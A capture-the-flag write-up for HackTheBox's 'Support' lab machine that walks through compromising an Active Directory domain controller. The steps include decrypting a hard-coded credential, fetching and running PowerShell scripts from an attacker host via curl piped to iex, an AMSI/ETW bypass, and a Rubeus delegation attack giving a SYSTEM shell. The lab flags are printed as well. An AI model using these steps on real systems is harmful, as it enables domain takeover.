Metadata
- Platform: HackTheBox
- CTF: Support
- OS: Windows
- Difficulty: Easy
Summary
A smb share allows unauthenticated access, which we can use to download a custom program. After decompiling it, we can extract a domain username and password for LDAP queries on the domain. Using this, we can go through information of all user accounts and find a clear text password for an account, which grants us a foothold into the system.
After enumerating the domain further, we discover that it is vulnerable to a Resource Based Constrained Delegation attack, allowing us to request a ticket to a high privileged account, which we should not be able to. After executing this attack, we can get local administrative access to the domain controller machine and compromise the target.
Solution
Reconnaissance
By utilizing Nmap, we can discover that we are dealing with an Active Directory environment.
nmap -sC -sV 10.10.11.174 -oN nmap.txt -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-17 16:34 CET
Nmap scan report for 10.10.11.174
Host is up (0.052s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-17 09:18:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: -6h16m25s
| smb2-time:
| date: 2025-03-17T09:18:15
|_ start_date: N/A
Let’s start the enumeration process with the open smb service. Since this service allow access with a NULL session, we can discover six shares with SMBclient, one of which is a custom one called support-tools
.
smbclient //10.10.11.174/support-tools -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jul 20 19:01:06 2022
.. D 0 Sat May 28 13:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 13:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 13:19:55 2022
putty.exe A 1273576 Sat May 28 13:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 13:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 19:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 13:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 13:19:43 2022
Most of the files on this share are standard executables, which we could retrieve from different websites. However, the UserInfo.exe.zip
seems to be the only one, which is not a publicly accessible file. Maybe it is worth to take a closer look at it. After downloading and extracting the file, we identify this file as an .NET
executable.
unzip UserInfo.exe.zip
file UserInfo.exe
UserInfo.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
User Flag
Due to the fact, that this is a compiled file, we don’t have direct access to the source code. Nevertheless, we can use an application such as ILSpy to decompile this file and take a deeper look into the source code. Upon loading the .exe
into this program, we can analyze the source code. It seems like the file performs authenticated LDAP queries on the domain.
string password = Protected.getPassword();
entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", password);
entry.set_AuthenticationType((AuthenticationTypes)1);
ds = new DirectorySearcher(entry);
This code section performs the authentication to the domain controller. For this to succeed, it loads a password string over another function, which we can also inspect.
private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
private static byte[] key = Encoding.ASCII.GetBytes("armando");
byte[] array = Convert.FromBase64String(enc_password);
byte[] array2 = array;
for (int i = 0; i < array.Length; i++)
{
array2[i] = (byte)((uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);
}
return Encoding.Default.GetString(array2);
Sadly, the password is not written in clear text. Instead, the code derives the password from a base64 encoded string. In order to get our hands on the password, we could either execute this program and intercept the request via Wireshark, or we can rewrite this code section in python to extract the password. For now, let’s use the second option.
import base64
def decrypt_password(enc_password: str, key: bytes) -> str:
array = bytearray(base64.b64decode(enc_password))
for i in range(len(array)):
array[i] = (array[i] ^ key[i % len(key)]) ^ 0xDF
return array.decode('utf-8', errors='ignore')
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = b"armando"
decrypted_password = decrypt_password(enc_password, key)
print(decrypted_password)
This script is the exact equivalent of the code from the executable. Once we execute it, it will dump the respective password.
python3 password_decrypt.py
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
As we now have extracted the credentials for the program, we can query the domain’s LDAP service ourselves. We can do this by using the account name and password with LDAPsearch.
ldapsearch -H ldap://10.10.11.174 -b "dc=support,dc=htb" -D support\\ldap -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' "*"
Since we get quite a long response from the service, it confirms that everything worked just fine. At this point, we could query many entries of the Domain, however, it possibly a good idea to start with the user account. Since there are many users, this output will be quite verbose.
ldapsearch -H ldap://10.10.11.174 -b "dc=support,dc=htb" -D support\\ldap -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' "(objectClass=user)"
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
<cut>
info: Ironside47pleasure40Watchful
<cut>
For the account support
, there is an info
entry, which contains a string resembling a password. We can use it to log into the target as this account with Evil-WinRM and claim the user flag.
evil-winrm -i 10.10.11.174 -u support -p Ironside47pleasure40Watchful
e5f07d436eaa5788330930ee440c536a
Root Flag
On the machine itself, I can’t discover anything of use. Therefore, we should probably take a closer look at the AD configuration, which we can enumerate with Bloodhound-python and feed the output into Bloodhound.
bloodhound-python -d support.htb -ns 10.10.11.174 -c all -u support -p Ironside47pleasure40Watchful
Since we only have access to support
, we can take a look at the outgoing transitive relations for this account. Since support
is a member of the Shared Support Accounts
group, which again has the GenericAll
permission over the domain controller.
Bloodhound already tells us that this relation can be used to perform a Resource Based Constrained Delegation Attack. Essentially, this attack allows us to inject a new machine into the AD environment, and delegate authentication requests to it, with which we can take over the domain. To exploit this weakness, we can follow both of the aforementioned information sources. For local exploitation, we first need to load PowerMad and PowerView, which we should both provide over a python http server from our attacking machine.
curl http://10.10.16.5:8080/Powermad.ps1 -UseBasicParsing | iex
curl http://10.10.16.5:8080/PowerView.ps1 -UseBasicParsing | iex
Once the script were loaded, we can start to add the new machine to the domain. In this case, we will call it attackersystem
and assign the password Summer2018!
. After setting it up, we add the respective delegation privileges.
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
$TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes
We can check whether this process was successful by querying for the privilege.
Get-NetComputer attackersystem | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity*
name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
attackersystem {1, 0, 4, 128...}
The output of this command looks as expected. Let’s continue with the last step: Using the delegation to obtain a Kerberos ticket for the Administrator. To achieve this, we need to use Rubeus, which we can download from our attacking machine. Remember to execute Bypass-4MSI, in case the executable get’s blocked.
Bypass-4MSI
Info: Patching 4MSI, please be patient...
[+] Success!
Info: Patching ETW, please be patient ..
[+] Success!
curl http://10.10.16.5:8080/Rubeus.exe -o Rubeus.exe
Before we can request the ticket, we first need to calculate the RC4 hash of the machine, we added to the domain. Otherwise, the next step won’t work.
.\Rubeus.exe hash /password:Summer2018!
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Calculate Password Hash(es)
[*] Input password : Summer2018!
[*] rc4_hmac : EF266C6B963C0BB683941032008AD47F
[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types
Now, we can once again use Rubeus to request the Administrator
’s Kerberos ticket from our added domain machine. For this command, it is important to select not the domain as the target, but the domain controller dc.support.htb
specifically.
.\Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: S4U
[*] Using rc4_hmac hash: EF266C6B963C0BB683941032008AD47F
[*] Building AS-REQ (w/ preauth) for: 'support.htb\attackersystem$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFojCCBZ6gA<cut>cnQuaHRi
[*] Action: S4U
[*] Building S4U2self request for: 'attackersystem$@SUPPORT.HTB'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'attackersystem$@SUPPORT.HTB'
[*] base64(ticket.kirbi):
doIFsjCCBa6g<cut>yc3lzdGVtJA==
[*] Impersonating user 'Administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':
doIGcDCCBmyg<cut>wcG9ydC5odGI=
[+] Ticket successfully imported
The output of this command is a bade64 encoded kirbi ticket, which is not yet usable for authentication purposes from our attacking machine. To use it, we need to first copy the base64 string, and remove all the whitespace. It’s possible to use a website such as this one for this purpose. Then, save the output to a file and decode the string. The output can then be used with TicketConverter, which will generate a .ccache
file, usable for authentication with Kerberos.
cat ticket.b64 | base64 -d > ticket
ticketConverter.py ticket ticket.ccache
One of the simplest ways to get a remote shell with a .ccache
file is PSexec. However, for this command to work, we need to remember that our ticket specifically references the domain controller, and not the domain itself. For the ticket to work, the referenced hostname must match the one in the ticket. For the same reason, we also need to add the respective entry in our local DNS resolver at /etc/hosts
.
KRB5CCNAME=/home/kali/htb/machines/support/ticket.ccache psexec.py -k -no-pass support.htb/administrator@dc.support.htb
After entering the command, we get a PowerShell session as authority\system
and can therefore claim the root flag.
ed08b6137b92ba2808c23b33197ea2cc